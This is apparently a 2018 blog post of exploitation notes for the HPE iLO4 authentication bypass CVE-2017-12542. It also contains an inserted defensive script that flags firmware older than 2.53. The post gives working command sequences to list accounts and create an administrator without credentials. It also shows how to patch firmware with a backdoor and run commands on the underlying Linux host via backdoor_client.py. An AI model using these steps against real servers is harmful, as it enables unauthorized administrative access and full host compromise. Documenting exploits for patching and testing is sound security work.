Month: June 2018

HPE iLO4 Authentication Bypass and RCE (CVE-2017-12542)

These are just a few notes on exploiting CVE-2017-12542. I am currently looking at various RCEs and backdoors available for different iLO versions and will hopefully do more articles soon.

How to list user accounts on HPE iLO 4
If you just need to list user accounts on the HPE iLO, you can use the following Python script (https://github.com/skelsec/CVE-2017-12542) or the Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account):

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -t x.x.x.x
[+] Target is VULNERABLE!
[+] Account name: User Account Username: Administrator

How to create a new user on HPE iLO 4
Should you want to create a new account on the HPE iLO, you can use the same script as above from https://github.com/skelsec/CVE-2017-12542 or the Metasploit module (https://www.rapid7.com/db/modules/auxiliary/admin/hp/hp_ilo_create_admin_account):

$ git clone https://github.com/skelsec/CVE-2017-12542
$ cd CVE-2017-12542
$ python exploit_1.py -u newadmin -p newadmin x.x.x.x

RCE on the HPE iLO
The backdoor scripts can be found at https://github.com/airbus-seclab/ilo4_toolbox/tree/master/scripts/iLO4. According to HPE's advisory, all iLO4 firmware versions prior to 2.53 are affected, so if you are running an old version in a corporate environment, please consider upgrading the firmware; the current release (2.60, 30 May 2018) can be obtained directly from HPE.
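
Since the advisory draws the line at firmware 2.53, a quick way to find exposed iLOs is to read the firmware revision from the same unauthenticated xmldata endpoint used in the steps below and compare it against that release. The following is an added example for that inventory check, not code from the original post or from the ilo4_toolbox project; the sample XML is constructed, and the handling of the "2.5.3" style revision string is an assumption.

```python
# Added example, not from the original post or the ilo4_toolbox project:
# flag iLO4 firmware older than 2.53 (the fixed release in HPE's advisory
# for CVE-2017-12542) from the unauthenticated /xmldata?item=all response.
import re
import ssl
import urllib.request
from typing import Optional, Tuple

FIXED_VERSION = (2, 53)  # firmware prior to 2.53 is affected

# Constructed sample response, trimmed to the element the check needs.
SAMPLE_XML = ("<RIMP><MP><PN>Integrated Lights-Out 4 (iLO 4)</PN>"
              "<FWRI>2.50</FWRI><HWRI>ASIC: 16</HWRI></MP></RIMP>")

def parse_fwri(xml: str) -> Optional[str]:
    """Return the <FWRI> firmware revision string, or None if absent."""
    m = re.search(r"<FWRI>\s*([^<\s]+)\s*</FWRI>", xml, re.IGNORECASE)
    return m.group(1) if m else None

def version_tuple(ver: str) -> Tuple[int, int]:
    """Normalise '2.53', '2.60' or the '2.5.3' form seen above to (major, minor).
    Assumption: the digits after the major number are the two-digit minor."""
    major, *rest = ver.split(".")
    minor_digits = "".join(rest)[:2].ljust(2, "0")
    return int(major), int(minor_digits)

def is_affected(ver: str) -> bool:
    """True when the firmware predates the fixed release."""
    return version_tuple(ver) < FIXED_VERSION

def audit_xml(host: str, xml: str) -> dict:
    """Classify one host from its xmldata body: affected, fixed or unknown."""
    ver = parse_fwri(xml)
    if ver is None:
        return {"host": host, "version": None, "status": "unknown"}
    status = "affected" if is_affected(ver) else "fixed"
    return {"host": host, "version": ver, "status": status}

def audit_host(host: str, timeout: float = 5.0) -> dict:
    """Fetch xmldata from a live iLO. iLO certificates are usually self-signed,
    so verification is disabled here; swap in a context built from your own CA."""
    ctx = ssl._create_unverified_context()
    url = f"https://{host}/xmldata?item=all"
    try:
        with urllib.request.urlopen(url, timeout=timeout, context=ctx) as resp:
            return audit_xml(host, resp.read().decode("utf-8", "replace"))
    except Exception as exc:  # connection, TLS or HTTP failure
        return {"host": host, "version": None, "status": f"error: {exc}"}

print(audit_xml("sample-ilo", SAMPLE_XML))
```

Run audit_host() over your management-network inventory and any host reported as "affected" is a candidate for the firmware upgrade above.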

Steps on how to get command execution on HP iLO and extract passwords

$ git clone https://github.com/airbus-seclab/ilo4_toolbox
$ curl -s -k https://x.x.x.x/xmldata?item=all | grep -i "<FWRI>"
<FWRI>2.5.3</FWRI>

$ wget https://downloads.hpe.com/pub/softlib2/software1/sc-linux-fw-ilo/p192122427/v129421/CP032487.scexe

$ chmod 755 CP032487.scexe

$ ./CP032487.scexe --unpack=/tmp/iLO

$ cd ilo4_toolbox/scripts/iLO4/

$ ./insert_backdoor.sh ilo4_253.bin

$ python backdoor_client.py x.x.x.x

ib.install_linux_backdoor()
ib.cmd("/usr/bin/id")
ib.remove_linux_backdoor()